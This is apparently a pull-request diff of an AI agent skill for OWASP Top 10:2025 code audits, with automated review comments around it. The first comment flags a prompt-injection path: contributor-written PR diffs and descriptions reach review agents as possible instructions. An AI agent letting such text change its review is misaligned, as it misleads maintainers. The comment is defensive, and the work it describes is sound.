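Review bot: In Step 3, "Each agent receives the PR diff and description" hands contributor-controlled text directly to the review agents, and nothing in Steps 3 to 6 tells them to treat that text as data rather than as instructions. Add an explicit rule that content inside the diff or the PR description must never change the review procedure or the verdict. Step 4 should read `README.md` and `CLAUDE.md` from the base branch, since the PR under review may modify them. Step 5 also lists three verdicts and a risk level without tying them to the severities under "Issues Found". A stated rule, such as any high-severity issue meaning "Needs changes", would make the verdict reproducible.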
@@ -0,0 +1,157 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: security-scanner
|
|
3
|
+
description: >-
|
|
4
|
+
Performs comprehensive OWASP Top 10:2025 security vulnerability analysis on any codebase.
|
|
5
|
+
Use this skill whenever the user asks to: review code for security, perform a security audit,
|
|
6
|
+
scan for vulnerabilities, find security issues, improve application security, check for OWASP
|
|
7
|
+
compliance, do a penetration test review, assess security posture, look for security flaws,
|
|
8
|
+
scan for security risks, harden an application, or check code for exploits. Also trigger when
|
|
9
|
+
the user mentions OWASP, CVEs, CWEs, security hardening, vulnerability assessment, or asks
|
|
10
|
+
for a security report — even if they don't explicitly say "security scan." This skill works
|
|
11
|
+
on any codebase in any language (JavaScript, TypeScript, Python, Java, Go, Ruby, C#, PHP, etc.).
|
|
12
|
+
---
|
|
13
|
+
|
|
14
|
+
# Security Scanner — OWASP Top 10:2025
|
|
15
|
+
|
|
16
|
+
Performs a systematic security audit of any codebase against all 10 OWASP 2025 categories. Produces a structured markdown report with severity ratings, code locations, and actionable remediation guidance.
|
|
17
|
+
|
|
18
|
+
## Execution Flow
|
|
19
|
+
|
|
20
|
+
Follow these four steps in order. Do not skip any step.
|
|
21
|
+
|
|
22
|
+
### Step 1: Detect Project Context
|
|
23
|
+
|
|
24
|
+
Determine whether you are working within an existing project or a blank workspace.
|
|
25
|
+
|
|
26
|
+
Check for source code by looking for common project indicators:
|
|
27
|
+
- `package.json`, `requirements.txt`, `go.mod`, `pom.xml`, `Cargo.toml`, `Gemfile`, `*.csproj`, `composer.json`
|
|
28
|
+
- Or any `src/`, `app/`, `lib/` directory containing code files
|
|
29
|
+
|
|
30
|
+
**If source code is found:** Use the current working directory as the analysis target. Proceed to Step 2.
|
|
31
|
+
|
|
32
|
+
**If NO source code is found:** Ask the user for a GitHub repository URL. Then clone it:
|
|
33
|
+
```bash
|
|
34
|
+
gh repo clone <url> ./audit-target
|
|
35
|
+
```
|
|
36
|
+
Use `./audit-target` as the analysis target directory. Proceed to Step 2.
|
|
37
|
+
|
|
38
|
+
### Step 2: Reconnaissance
|
|
39
|
+
|
|
40
|
+
Before scanning for vulnerabilities, understand what you're analyzing. This context shapes which patterns matter most.
|
|
41
|
+
|
|
42
|
+
1. **Identify the tech stack** — Read the main dependency manifest (package.json, requirements.txt, etc.) to determine language(s), framework(s), and key libraries
|
|
43
|
+
2. **Map the project structure** — Use Glob to find all source files and understand the directory layout
|
|
44
|
+
3. **Locate entry points** — Find API routes, controllers, handlers, page components (e.g., `**/api/**/*.ts`, `**/routes/**`, `**/controllers/**`, `**/views/**`)
|
|
45
|
+
4. **Find config files** — Glob for `**/*.config.*`, `**/.env*`, `**/settings.*`, `**/application.*`
|
|
46
|
+
5. **Identify auth modules** — Search for authentication/authorization logic, session management, middleware
|
|
47
|
+
6. **Find database access** — Locate ORM models, raw query files, database connection setup
|
|
48
|
+
|
|
49
|
+
Record your findings — they guide which detection patterns to prioritize in Step 3.
|
|
50
|
+
|
|
51
|
+
### Step 3: Systematic Analysis
|
|
52
|
+
|
|
53
|
+
For each OWASP category A01 through A10:
|
|
54
|
+
|
|
55
|
+
1. **Read the reference file** for that category from `references/` to load the relevant CWEs, detection patterns, and grep expressions
|
|
56
|
+
2. **Search the codebase** using the patterns from the reference file — use Grep for pattern matching and Glob for file discovery
|
|
57
|
+
3. **Read flagged files** to confirm findings and get exact line numbers
|
|
58
|
+
4. **Record each finding** with: file path, line number(s), severity level, CWE, description, evidence (code snippet), and recommended fix
|
|
59
|
+
|
|
60
|
+
Analyze each category in order:
|
|
61
|
+
|
|
62
|
+
#### A01: Broken Access Control
|
|
63
|
+
See [references/A01-broken-access-control.md](references/A01-broken-access-control.md) for CWEs, detection patterns, and fix examples.
|
|
64
|
+
|
|
65
|
+
Focus on: missing auth middleware on routes, IDOR (user-controlled IDs without ownership checks), permissive CORS, directory traversal, missing CSRF protection, privilege escalation, force browsing to admin/debug endpoints.
|
|
66
|
+
|
|
67
|
+
#### A02: Security Misconfiguration
|
|
68
|
+
See [references/A02-security-misconfiguration.md](references/A02-security-misconfiguration.md).
|
|
69
|
+
|
|
70
|
+
Focus on: debug mode in production, default credentials, verbose error messages exposing internals, unnecessary features enabled, missing security headers, hardcoded secrets, exposed environment variables.
|
|
71
|
+
|
|
72
|
+
#### A03: Software Supply Chain Failures
|
|
73
|
+
See [references/A03-software-supply-chain-failures.md](references/A03-software-supply-chain-failures.md).
|
|
74
|
+
|
|
75
|
+
Focus on: known vulnerable dependency versions, unpinned dependencies, CDN scripts without SRI, missing lock files, dependencies from untrusted sources.
|
|
76
|
+
|
|
77
|
+
#### A04: Cryptographic Failures
|
|
78
|
+
See [references/A04-cryptographic-failures.md](references/A04-cryptographic-failures.md).
|
|
79
|
+
|
|
80
|
+
Focus on: weak password hashing (MD5, SHA1), missing salt, hardcoded keys/secrets, weak randomness (Math.random for tokens), cookies missing Secure flag, sensitive data in logs, base64 used as "encryption."
|
|
81
|
+
|
|
82
|
+
#### A05: Injection
|
|
83
|
+
See [references/A05-injection.md](references/A05-injection.md).
|
|
84
|
+
|
|
85
|
+
Focus on: SQL injection (string concatenation in queries), command injection (exec/spawn with user input), XSS (dangerouslySetInnerHTML, innerHTML), eval() with user input, SSRF (fetching user-supplied URLs), template injection.
|
|
86
|
+
|
|
87
|
+
#### A06: Insecure Design
|
|
88
|
+
See [references/A06-insecure-design.md](references/A06-insecure-design.md).
|
|
89
|
+
|
|
90
|
+
Focus on: missing rate limiting on auth endpoints, no input validation, no password complexity requirements, missing account lockout, unrestricted file uploads, guessable/non-expiring tokens.
|
|
91
|
+
|
|
92
|
+
#### A07: Authentication Failures
|
|
93
|
+
See [references/A07-authentication-failures.md](references/A07-authentication-failures.md).
|
|
94
|
+
|
|
95
|
+
Focus on: weak/predictable session tokens, sessions that never expire, credentials in logs/URLs, user enumeration via different error messages, reset tokens in API responses, cookies without HttpOnly/Secure/SameSite, hard-coded credentials.
|
|
96
|
+
|
|
97
|
+
#### A08: Software or Data Integrity Failures
|
|
98
|
+
See [references/A08-software-data-integrity-failures.md](references/A08-software-data-integrity-failures.md).
|
|
99
|
+
|
|
100
|
+
Focus on: eval()/Function() with user input, deserialization of untrusted data, CDN scripts without integrity hashes, mass assignment/prototype pollution, auto-updates without signature verification.
|
|
101
|
+
|
|
102
|
+
#### A09: Security Logging and Alerting Failures
|
|
103
|
+
See [references/A09-security-logging-alerting-failures.md](references/A09-security-logging-alerting-failures.md).
|
|
104
|
+
|
|
105
|
+
Focus on: passwords/tokens/PII in logs, missing audit logging for auth events, no logging on access control failures, error details exposed to users, console.log-only logging without persistence.
|
|
106
|
+
|
|
107
|
+
#### A10: Mishandling of Exceptional Conditions
|
|
108
|
+
See [references/A10-mishandling-exceptional-conditions.md](references/A10-mishandling-exceptional-conditions.md).
|
|
109
|
+
|
|
110
|
+
Focus on: empty catch blocks, stack traces returned to users, fail-open patterns, missing error handling on async operations, resource leaks on exceptions, missing transaction rollbacks.
|
|
111
|
+
|
|
112
|
+
### Step 4: Generate Report
|
|
113
|
+
|
|
114
|
+
1. Get today's date and create the output directory:
|
|
115
|
+
```bash
|
|
116
|
+
mkdir -p ./audit/YYYY-MM-DD/
|
|
117
|
+
```
|
|
118
|
+
|
|
119
|
+
2. Read the report template from [references/report-template.md](references/report-template.md)
|
|
120
|
+
|
|
121
|
+
3. Fill in the template with all findings from Step 3 and write the completed report to:
|
|
122
|
+
```
|
|
123
|
+
./audit/YYYY-MM-DD/security-report.md
|
|
124
|
+
```
|
|
125
|
+
|
|
126
|
+
4. Present a brief summary to the user: total findings by severity, overall risk score, and the top 3 most critical items to address immediately.
|
|
127
|
+
|
|
128
|
+
## Severity Classification
|
|
129
|
+
|
|
130
|
+
Assign each finding one of these severity levels:
|
|
131
|
+
|
|
132
|
+
- **Critical** (10 pts): Actively exploitable with immediate data breach risk. Examples: SQL injection, remote code execution, authentication bypass, exposed credentials, command injection.
|
|
133
|
+
|
|
134
|
+
- **High** (7 pts): Exploitable with moderate effort, significant impact. Examples: XSS, CSRF, weak cryptography, IDOR, SSRF, known vulnerable dependencies.
|
|
135
|
+
|
|
136
|
+
- **Medium** (4 pts): Requires specific conditions or must be chained with other vulnerabilities. Examples: missing security headers, verbose errors, user enumeration, missing rate limiting.
|
|
137
|
+
|
|
138
|
+
- **Low** (2 pts): Defense-in-depth issues, best-practice deviations. Examples: weak password policy, console-only logging, missing SRI on CDN scripts.
|
|
139
|
+
|
|
140
|
+
- **Info** (0 pts): Observations and recommendations with no direct exploit path. Examples: outdated but non-vulnerable dependencies, missing SBOM, code quality notes.
|
|
141
|
+
|
|
142
|
+
## Risk Score
|
|
143
|
+
|
|
144
|
+
Sum all finding points to calculate the overall risk score:
|
|
145
|
+
- **0–10**: Low Risk
|
|
146
|
+
- **11–30**: Moderate Risk
|
|
147
|
+
- **31–60**: High Risk
|
|
148
|
+
- **61+**: Critical Risk
|
|
149
|
+
|
|
150
|
+
## Important Guidelines
|
|
151
|
+
|
|
152
|
+
- **Read-only analysis**: Never modify any source files in the target project. The audit directory is the only location where files should be written.
|
|
153
|
+
- **Cover all 10 categories**: If a category has no findings, still include it in the report with "No issues identified" and note what was checked.
|
|
154
|
+
- **Be specific**: Every finding must reference a specific file path and line number(s). Include the actual vulnerable code snippet as evidence.
|
|
155
|
+
- **Provide fixes**: Every finding must include an actionable remediation recommendation with a code example showing the fix.
|
|
156
|
+
- **No false positives**: Read and understand the code context before flagging. A `console.log` in a build script is not the same as a `console.log` leaking passwords in a login handler.
|
|
157
|
+
- **Prioritize**: Order the remediation priority section by actual exploitability and impact, not just severity label.
|
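Review bot: The Risk Score bands contradict the Severity Classification: one Critical finding is 10 pts, which lands in "0–10: Low Risk", so a codebase with a single SQL injection or exposed credential is reported as low risk. Set a floor from the highest severity present (for example, any Critical yields at least High Risk) or move the band edges. A raw sum also grows with codebase size rather than with exposure. Separately, "Be specific" requires the actual code snippet as evidence, while A02 and A04 target hardcoded secrets and Step 2 globs `**/.env*`. The report at `./audit/YYYY-MM-DD/security-report.md` will therefore carry secret values verbatim unless the skill says to redact them and to keep `./audit/` out of version control. Step 1 also writes a clone to `./audit-target`, which conflicts with the guideline that the audit directory is the only location where files should be written.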